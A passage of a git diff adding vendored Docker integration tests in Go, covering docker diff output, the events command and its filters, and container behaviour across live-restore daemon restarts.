out1, err := s.d.Cmd("exec", "-u", "test", "top", "id") + // uid=100(test) gid=101(test) groups=101(test) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out1)) + + // restart daemon. 
+ s.d.Restart("--live-restore") + + out2, err := s.d.Cmd("exec", "-u", "test", "top", "id") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out2)) + c.Assert(out1, check.Equals, out2, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2)) + + out, err = s.d.Cmd("stop", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) +} + +func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) { + testRequires(c, DaemonIsLinux, overlayFSSupported, SameHostDaemon) + s.d.StartWithBusybox("--live-restore", "--storage-driver", "overlay") + out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + + s.d.waitRun("top") + + // restart daemon. + s.d.Restart("--live-restore", "--storage-driver", "overlay") + + out, err = s.d.Cmd("stop", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + + // test if the rootfs mountpoint still exist + mountpoint, err := s.d.inspectFilter("top", ".GraphDriver.Data.MergedDir") + c.Assert(err, check.IsNil) + f, err := os.Open("/proc/self/mountinfo") + c.Assert(err, check.IsNil) + defer f.Close() + sc := bufio.NewScanner(f) + for sc.Scan() { + line := sc.Text() + if strings.Contains(line, mountpoint) { + c.Fatalf("mountinfo should not include the mountpoint of stop container") + } + } + + out, err = s.d.Cmd("rm", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go new file mode 100644 index 0000000000..08cf6e1caa --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go @@ -0,0 +1,98 @@ +package main + +import ( + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// ensure that an added file shows up in docker diff +func 
(s *DockerSuite) TestDiffFilenameShownInOutput(c *check.C) { + containerCmd := `mkdir /foo; echo xyzzy > /foo/bar` + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd) + + // Wait for it to exit as cannot diff a running container on Windows, and + // it will take a few seconds to exit. Also there's no way in Windows to + // differentiate between an Add or a Modify, and all files are under + // a "Files/" prefix. + containerID := strings.TrimSpace(out) + lookingFor := "A /foo/bar" + if daemonPlatform == "windows" { + err := waitExited(containerID, 60*time.Second) + c.Assert(err, check.IsNil) + lookingFor = "C Files/foo/bar" + } + + cleanCID := strings.TrimSpace(out) + out, _ = dockerCmd(c, "diff", cleanCID) + + found := false + for _, line := range strings.Split(out, "\n") { + if strings.Contains(line, lookingFor) { + found = true + break + } + } + c.Assert(found, checker.True) +} + +// test to ensure GH #3840 doesn't occur any more +func (s *DockerSuite) TestDiffEnsureInitLayerFilesAreIgnored(c *check.C) { + testRequires(c, DaemonIsLinux) + // this is a list of files which shouldn't show up in `docker diff` + initLayerFiles := []string{"/etc/resolv.conf", "/etc/hostname", "/etc/hosts", "/.dockerenv"} + containerCount := 5 + + // we might not run into this problem from the first run, so start a few containers + for i := 0; i < containerCount; i++ { + containerCmd := `echo foo > /root/bar` + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd) + + cleanCID := strings.TrimSpace(out) + out, _ = dockerCmd(c, "diff", cleanCID) + + for _, filename := range initLayerFiles { + c.Assert(out, checker.Not(checker.Contains), filename) + } + } +} + +func (s *DockerSuite) TestDiffEnsureDefaultDevs(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "0") + + cleanCID := strings.TrimSpace(out) + out, _ = dockerCmd(c, "diff", cleanCID) + + expected := map[string]bool{ + "C /dev": true, + 
"A /dev/full": true, // busybox + "C /dev/ptmx": true, // libcontainer + "A /dev/mqueue": true, + "A /dev/kmsg": true, + "A /dev/fd": true, + "A /dev/ptmx": true, + "A /dev/null": true, + "A /dev/random": true, + "A /dev/stdout": true, + "A /dev/stderr": true, + "A /dev/tty1": true, + "A /dev/stdin": true, + "A /dev/tty": true, + "A /dev/urandom": true, + "A /dev/zero": true, + } + + for _, line := range strings.Split(out, "\n") { + c.Assert(line == "" || expected[line], checker.True, check.Commentf(line)) + } +} + +// https://github.com/docker/docker/pull/14381#discussion_r33859347 +func (s *DockerSuite) TestDiffEmptyArgClientError(c *check.C) { + out, _, err := dockerCmdWithError("diff", "") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "Container name cannot be empty") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go new file mode 100644 index 0000000000..1fbfc742de --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go @@ -0,0 +1,794 @@ +package main + +import ( + "bufio" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "os" + "os/exec" + "strings" + "time" + + eventtypes "github.com/docker/docker/api/types/events" + eventstestutils "github.com/docker/docker/daemon/events/testutils" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) { + name := "events-time-format-test" + + // Start stopwatch, generate an event + start := daemonTime(c) + time.Sleep(1100 * time.Millisecond) // so that first event occur in different second from since (just for the case) + dockerCmd(c, "run", "--rm", "--name", name, "busybox", "true") + time.Sleep(1100 * time.Millisecond) // so that until > since + end := daemonTime(c) + + // 
List of available time formats to --since + unixTs := func(t time.Time) string { return fmt.Sprintf("%v", t.Unix()) } + rfc3339 := func(t time.Time) string { return t.Format(time.RFC3339) } + duration := func(t time.Time) string { return time.Now().Sub(t).String() } + + // --since=$start must contain only the 'untag' event + for _, f := range []func(time.Time) string{unixTs, rfc3339, duration} { + since, until := f(start), f(end) + out, _ := dockerCmd(c, "events", "--since="+since, "--until="+until) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event + containerEvents := eventActionsByIDAndType(c, events, name, "container") + c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events)) + + c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out)) + c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out)) + c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out)) + c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out)) + c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out)) + } +} + +func (s *DockerSuite) TestEventsUntag(c *check.C) { + image := "busybox" + dockerCmd(c, "tag", image, "utest:tag1") + dockerCmd(c, "tag", image, "utest:tag2") + dockerCmd(c, "rmi", "utest:tag1") + dockerCmd(c, "rmi", "utest:tag2") + + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "events", "--since=1"}, + Timeout: time.Millisecond * 2500, + }) + c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + + events := strings.Split(result.Stdout(), "\n") + nEvents := len(events) + // The last element after the split above will be an empty string, so we + // get the two elements before the last, which are the untags we're + // looking for. 
+ for _, v := range events[nEvents-3 : nEvents-1] { + c.Assert(v, checker.Contains, "untag", check.Commentf("event should be untag")) + } +} + +func (s *DockerSuite) TestEventsLimit(c *check.C) { + // Limit to 8 goroutines creating containers in order to prevent timeouts + // creating so many containers simultaneously on Windows + sem := make(chan bool, 8) + numContainers := 17 + errChan := make(chan error, numContainers) + + args := []string{"run", "--rm", "busybox", "true"} + for i := 0; i < numContainers; i++ { + sem <- true + go func() { + defer func() { <-sem }() + out, err := exec.Command(dockerBinary, args...).CombinedOutput() + if err != nil { + err = fmt.Errorf("%v: %s", err, string(out)) + } + errChan <- err + }() + } + + // Wait for all goroutines to finish + for i := 0; i < cap(sem); i++ { + sem <- true + } + close(errChan) + + for err := range errChan { + c.Assert(err, checker.IsNil, check.Commentf("%q failed with error", strings.Join(args, " "))) + } + + out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + nEvents := len(events) - 1 + c.Assert(nEvents, checker.Equals, 64, check.Commentf("events should be limited to 64, but received %d", nEvents)) +} + +func (s *DockerSuite) TestEventsContainerEvents(c *check.C) { + dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true") + + out, _ := dockerCmd(c, "events", "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event + containerEvents := eventActionsByIDAndType(c, events, "container-events-test", "container") + c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events)) + + c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out)) + c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out)) + 
c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out)) + c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out)) + c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsContainerEventsAttrSort(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true") + + out, _ := dockerCmd(c, "events", "--filter", "container=container-events-test", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 3) //Missing expected event + matchedEvents := 0 + for _, event := range events { + matches := eventstestutils.ScanMap(event) + if matches["eventType"] == "container" && matches["action"] == "create" { + matchedEvents++ + c.Assert(out, checker.Contains, "(image=busybox, name=container-events-test)", check.Commentf("Event attributes not sorted")) + } else if matches["eventType"] == "container" && matches["action"] == "start" { + matchedEvents++ + c.Assert(out, checker.Contains, "(image=busybox, name=container-events-test)", check.Commentf("Event attributes not sorted")) + } + } + c.Assert(matchedEvents, checker.Equals, 2, check.Commentf("missing events for container container-events-test:\n%s", out)) +} + +func (s *DockerSuite) TestEventsContainerEventsSinceUnixEpoch(c *check.C) { + dockerCmd(c, "run", "--rm", "--name", "since-epoch-test", "busybox", "true") + timeBeginning := time.Unix(0, 0).Format(time.RFC3339Nano) + timeBeginning = strings.Replace(timeBeginning, "Z", ".000000000Z", -1) + out, _ := dockerCmd(c, "events", "--since", timeBeginning, "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event + containerEvents := eventActionsByIDAndType(c, events, 
"since-epoch-test", "container") + c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events)) + + c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out)) + c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out)) + c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out)) + c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out)) + c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsImageTag(c *check.C) { + time.Sleep(1 * time.Second) // because API has seconds granularity + since := daemonUnixTime(c) + image := "testimageevents:tag" + dockerCmd(c, "tag", "busybox", image) + + out, _ := dockerCmd(c, "events", + "--since", since, "--until", daemonUnixTime(c)) + + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1, check.Commentf("was expecting 1 event. out=%s", out)) + event := strings.TrimSpace(events[0]) + + matches := eventstestutils.ScanMap(event) + c.Assert(matchEventID(matches, image), checker.True, check.Commentf("matches: %v\nout:\n%s", matches, out)) + c.Assert(matches["action"], checker.Equals, "tag") +} + +func (s *DockerSuite) TestEventsImagePull(c *check.C) { + // TODO Windows: Enable this test once pull and reliable image names are available + testRequires(c, DaemonIsLinux) + since := daemonUnixTime(c) + testRequires(c, Network) + + dockerCmd(c, "pull", "hello-world") + + out, _ := dockerCmd(c, "events", + "--since", since, "--until", daemonUnixTime(c)) + + events := strings.Split(strings.TrimSpace(out), "\n") + event := strings.TrimSpace(events[len(events)-1]) + matches := eventstestutils.ScanMap(event) + c.Assert(matches["id"], checker.Equals, "hello-world:latest") + c.Assert(matches["action"], checker.Equals, "pull") + +} + +func (s *DockerSuite) TestEventsImageImport(c *check.C) { + // TODO Windows CI. 
This should be portable once export/import are + // more reliable (@swernli) + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + cleanedContainerID := strings.TrimSpace(out) + + since := daemonUnixTime(c) + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "export", cleanedContainerID), + exec.Command(dockerBinary, "import", "-"), + ) + c.Assert(err, checker.IsNil, check.Commentf("import failed with output: %q", out)) + imageRef := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=import") + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + matches := eventstestutils.ScanMap(events[0]) + c.Assert(matches["id"], checker.Equals, imageRef, check.Commentf("matches: %v\nout:\n%s\n", matches, out)) + c.Assert(matches["action"], checker.Equals, "import", check.Commentf("matches: %v\nout:\n%s\n", matches, out)) +} + +func (s *DockerSuite) TestEventsImageLoad(c *check.C) { + testRequires(c, DaemonIsLinux) + myImageName := "footest:v1" + dockerCmd(c, "tag", "busybox", myImageName) + since := daemonUnixTime(c) + + out, _ := dockerCmd(c, "images", "-q", "--no-trunc", myImageName) + longImageID := strings.TrimSpace(out) + c.Assert(longImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty")) + + dockerCmd(c, "save", "-o", "saveimg.tar", myImageName) + dockerCmd(c, "rmi", myImageName) + out, _ = dockerCmd(c, "images", "-q", myImageName) + noImageID := strings.TrimSpace(out) + c.Assert(noImageID, checker.Equals, "", check.Commentf("Should not have any image")) + dockerCmd(c, "load", "-i", "saveimg.tar") + + result := icmd.RunCommand("rm", "-rf", "saveimg.tar") + c.Assert(result, icmd.Matches, icmd.Success) + + out, _ = dockerCmd(c, "images", "-q", "--no-trunc", myImageName) + imageID := strings.TrimSpace(out) + c.Assert(imageID, checker.Equals, longImageID, 
check.Commentf("Should have same image id as before")) + + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=load") + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + matches := eventstestutils.ScanMap(events[0]) + c.Assert(matches["id"], checker.Equals, imageID, check.Commentf("matches: %v\nout:\n%s\n", matches, out)) + c.Assert(matches["action"], checker.Equals, "load", check.Commentf("matches: %v\nout:\n%s\n", matches, out)) + + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=save") + events = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + matches = eventstestutils.ScanMap(events[0]) + c.Assert(matches["id"], checker.Equals, imageID, check.Commentf("matches: %v\nout:\n%s\n", matches, out)) + c.Assert(matches["action"], checker.Equals, "save", check.Commentf("matches: %v\nout:\n%s\n", matches, out)) +} + +func (s *DockerSuite) TestEventsPluginOps(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + since := daemonUnixTime(c) + + dockerCmd(c, "plugin", "install", pNameWithTag, "--grant-all-permissions") + dockerCmd(c, "plugin", "disable", pNameWithTag) + dockerCmd(c, "plugin", "remove", pNameWithTag) + + out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 4) + + pluginEvents := eventActionsByIDAndType(c, events, pNameWithTag, "plugin") + c.Assert(pluginEvents, checker.HasLen, 4, check.Commentf("events: %v", events)) + + c.Assert(pluginEvents[0], checker.Equals, "pull", check.Commentf(out)) + c.Assert(pluginEvents[1], checker.Equals, "enable", check.Commentf(out)) + c.Assert(pluginEvents[2], checker.Equals, "disable", check.Commentf(out)) + c.Assert(pluginEvents[3], checker.Equals, "remove", 
check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsFilters(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "--rm", "busybox", "true") + dockerCmd(c, "run", "--rm", "busybox", "true") + out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=die") + parseEvents(c, out, "die") + + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=die", "--filter", "event=start") + parseEvents(c, out, "die|start") + + // make sure we at least got 2 start events + count := strings.Count(out, "start") + c.Assert(strings.Count(out, "start"), checker.GreaterOrEqualThan, 2, check.Commentf("should have had 2 start events but had %d, out: %s", count, out)) + +} + +func (s *DockerSuite) TestEventsFilterImageName(c *check.C) { + since := daemonUnixTime(c) + + out, _ := dockerCmd(c, "run", "--name", "container_1", "-d", "busybox:latest", "true") + container1 := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "--name", "container_2", "-d", "busybox", "true") + container2 := strings.TrimSpace(out) + + name := "busybox" + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("image=%s", name)) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + c.Assert(events, checker.Not(checker.HasLen), 0) //Expected events but found none for the image busybox:latest + count1 := 0 + count2 := 0 + + for _, e := range events { + if strings.Contains(e, container1) { + count1++ + } else if strings.Contains(e, container2) { + count2++ + } + } + c.Assert(count1, checker.Not(checker.Equals), 0, check.Commentf("Expected event from container but got %d from %s", count1, container1)) + c.Assert(count2, checker.Not(checker.Equals), 0, check.Commentf("Expected event from container but got %d from %s", count2, container2)) + +} + +func (s *DockerSuite) TestEventsFilterLabels(c *check.C) { + since := daemonUnixTime(c) + label := 
"io.docker.testing=foo" + + out, _ := dockerCmd(c, "run", "-d", "-l", label, "busybox:latest", "true") + container1 := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "-d", "busybox", "true") + container2 := strings.TrimSpace(out) + + out, _ = dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", fmt.Sprintf("label=%s", label)) + + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.Equals, 3) + + for _, e := range events { + c.Assert(e, checker.Contains, container1) + c.Assert(e, checker.Not(checker.Contains), container2) + } +} + +func (s *DockerSuite) TestEventsFilterImageLabels(c *check.C) { + since := daemonUnixTime(c) + name := "labelfiltertest" + label := "io.docker.testing=image" + + // Build a test image. + _, err := buildImage(name, fmt.Sprintf(` + FROM busybox:latest + LABEL %s`, label), true) + c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) + + dockerCmd(c, "tag", name, "labelfiltertest:tag1") + dockerCmd(c, "tag", name, "labelfiltertest:tag2") + dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3") + + out, _ := dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", fmt.Sprintf("label=%s", label), + "--filter", "type=image") + + events := strings.Split(strings.TrimSpace(out), "\n") + + // 2 events from the "docker tag" command, another one is from "docker build" + c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events)) + for _, e := range events { + c.Assert(e, checker.Contains, "labelfiltertest") + } +} + +func (s *DockerSuite) TestEventsFilterContainer(c *check.C) { + since := daemonUnixTime(c) + nameID := make(map[string]string) + + for _, name := range []string{"container_1", "container_2"} { + dockerCmd(c, "run", "--name", name, "busybox", "true") + id := inspectField(c, name, "Id") + nameID[name] = id + } + + until := daemonUnixTime(c) + + checkEvents := func(id string, events 
[]string) error { + if len(events) != 4 { // create, attach, start, die + return fmt.Errorf("expected 4 events, got %v", events) + } + for _, event := range events { + matches := eventstestutils.ScanMap(event) + if !matchEventID(matches, id) { + return fmt.Errorf("expected event for container id %s: %s - parsed container id: %s", id, event, matches["id"]) + } + } + return nil + } + + for name, ID := range nameID { + // filter by names + out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "container="+name) + events := strings.Split(strings.TrimSuffix(out, "\n"), "\n") + c.Assert(checkEvents(ID, events), checker.IsNil) + + // filter by ID's + out, _ = dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "container="+ID) + events = strings.Split(strings.TrimSuffix(out, "\n"), "\n") + c.Assert(checkEvents(ID, events), checker.IsNil) + } +} + +func (s *DockerSuite) TestEventsCommit(c *check.C) { + // Problematic on Windows as cannot commit a running container + testRequires(c, DaemonIsLinux) + + out, _ := runSleepingContainer(c) + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + dockerCmd(c, "commit", "-m", "test", cID) + dockerCmd(c, "stop", cID) + c.Assert(waitExited(cID, 5*time.Second), checker.IsNil) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + c.Assert(out, checker.Contains, "commit", check.Commentf("Missing 'commit' log event")) +} + +func (s *DockerSuite) TestEventsCopy(c *check.C) { + // Build a test image. + id, err := buildImage("cpimg", ` + FROM busybox + RUN echo HI > /file`, true) + c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) + + // Create an empty test file. 
+ tempFile, err := ioutil.TempFile("", "test-events-copy-") + c.Assert(err, checker.IsNil) + defer os.Remove(tempFile.Name()) + + c.Assert(tempFile.Close(), checker.IsNil) + + dockerCmd(c, "create", "--name=cptest", id) + + dockerCmd(c, "cp", "cptest:/file", tempFile.Name()) + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since=0", "-f", "container=cptest", "--until="+until) + c.Assert(out, checker.Contains, "archive-path", check.Commentf("Missing 'archive-path' log event\n")) + + dockerCmd(c, "cp", tempFile.Name(), "cptest:/filecopy") + + until = daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container=cptest", "--until="+until) + c.Assert(out, checker.Contains, "extract-to-dir", check.Commentf("Missing 'extract-to-dir' log event")) +} + +func (s *DockerSuite) TestEventsResize(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + endpoint := "/containers/" + cID + "/resize?h=80&w=24" + status, _, err := sockRequest("POST", endpoint, nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "stop", cID) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + c.Assert(out, checker.Contains, "resize", check.Commentf("Missing 'resize' log event")) +} + +func (s *DockerSuite) TestEventsAttach(c *check.C) { + // TODO Windows CI: Figure out why this test fails intermittently (TP5). 
+ testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-di", "busybox", "cat") + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + cmd := exec.Command(dockerBinary, "attach", cID) + stdin, err := cmd.StdinPipe() + c.Assert(err, checker.IsNil) + defer stdin.Close() + stdout, err := cmd.StdoutPipe() + c.Assert(err, checker.IsNil) + defer stdout.Close() + c.Assert(cmd.Start(), checker.IsNil) + defer cmd.Process.Kill() + + // Make sure we're done attaching by writing/reading some stuff + _, err = stdin.Write([]byte("hello\n")) + c.Assert(err, checker.IsNil) + out, err = bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello'")) + + c.Assert(stdin.Close(), checker.IsNil) + + dockerCmd(c, "kill", cID) + c.Assert(waitExited(cID, 5*time.Second), checker.IsNil) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + c.Assert(out, checker.Contains, "attach", check.Commentf("Missing 'attach' log event")) +} + +func (s *DockerSuite) TestEventsRename(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "oldName", "busybox", "true") + cID := strings.TrimSpace(out) + dockerCmd(c, "rename", "oldName", "newName") + + until := daemonUnixTime(c) + // filter by the container id because the name in the event will be the new name. 
+ out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until", until) + c.Assert(out, checker.Contains, "rename", check.Commentf("Missing 'rename' log event\n")) +} + +func (s *DockerSuite) TestEventsTop(c *check.C) { + // Problematic on Windows as Windows does not support top + testRequires(c, DaemonIsLinux) + + out, _ := runSleepingContainer(c, "-d") + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + dockerCmd(c, "top", cID) + dockerCmd(c, "stop", cID) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + c.Assert(out, checker.Contains, " top", check.Commentf("Missing 'top' log event")) +} + +// #14316 +func (s *DockerRegistrySuite) TestEventsImageFilterPush(c *check.C) { + // Problematic to port for Windows CI during TP5 timeframe until + // supporting push + testRequires(c, DaemonIsLinux) + testRequires(c, Network) + repoName := fmt.Sprintf("%v/dockercli/testf", privateRegistryURL) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + dockerCmd(c, "commit", cID, repoName) + dockerCmd(c, "stop", cID) + dockerCmd(c, "push", repoName) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "image="+repoName, "-f", "event=push", "--until", until) + c.Assert(out, checker.Contains, repoName, check.Commentf("Missing 'push' log event for %s", repoName)) +} + +func (s *DockerSuite) TestEventsFilterType(c *check.C) { + since := daemonUnixTime(c) + name := "labelfiltertest" + label := "io.docker.testing=image" + + // Build a test image. 
+ _, err := buildImage(name, fmt.Sprintf(` + FROM busybox:latest + LABEL %s`, label), true) + c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) + + dockerCmd(c, "tag", name, "labelfiltertest:tag1") + dockerCmd(c, "tag", name, "labelfiltertest:tag2") + dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3") + + out, _ := dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", fmt.Sprintf("label=%s", label), + "--filter", "type=image") + + events := strings.Split(strings.TrimSpace(out), "\n") + + // 2 events from the "docker tag" command, another one is from "docker build" + c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events)) + for _, e := range events { + c.Assert(e, checker.Contains, "labelfiltertest") + } + + out, _ = dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", fmt.Sprintf("label=%s", label), + "--filter", "type=container") + events = strings.Split(strings.TrimSpace(out), "\n") + + // Events generated by the container that builds the image + c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events)) + + out, _ = dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", "type=network") + events = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterOrEqualThan, 1, check.Commentf("Events == %s", events)) +} + +// #25798 +func (s *DockerSuite) TestEventsSpecialFiltersWithExecCreate(c *check.C) { + since := daemonUnixTime(c) + runSleepingContainer(c, "--name", "test-container", "-d") + waitRun("test-container") + + dockerCmd(c, "exec", "test-container", "echo", "hello-world") + + out, _ := dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", + "event='exec_create: echo hello-world'", + ) + + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.Equals, 1, check.Commentf(out)) + + 
out, _ = dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", + "event=exec_create", + ) + c.Assert(len(events), checker.Equals, 1, check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsFilterImageInContainerAction(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true") + waitRun("test-container") + + out, _ := dockerCmd(c, "events", "--filter", "image=busybox", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterThan, 1, check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsContainerRestart(c *check.C) { + dockerCmd(c, "run", "-d", "--name=testEvent", "--restart=on-failure:3", "busybox", "false") + + // wait until test2 is auto removed. + waitTime := 10 * time.Second + if daemonPlatform == "windows" { + // Windows takes longer... + waitTime = 90 * time.Second + } + + err := waitInspect("testEvent", "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTime) + c.Assert(err, checker.IsNil) + + var ( + createCount int + startCount int + dieCount int + ) + out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c), "-f", "container=testEvent") + events := strings.Split(strings.TrimSpace(out), "\n") + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 1) //Missing expected event + actions := eventActionsByIDAndType(c, events, "testEvent", "container") + + for _, a := range actions { + switch a { + case "create": + createCount++ + case "start": + startCount++ + case "die": + dieCount++ + } + } + c.Assert(createCount, checker.Equals, 1, check.Commentf("testEvent should be created 1 times: %v", actions)) + c.Assert(startCount, checker.Equals, 4, check.Commentf("testEvent should start 4 times: %v", actions)) + c.Assert(dieCount, checker.Equals, 4, check.Commentf("testEvent should die 4 times: %v", actions)) +} + +func (s 
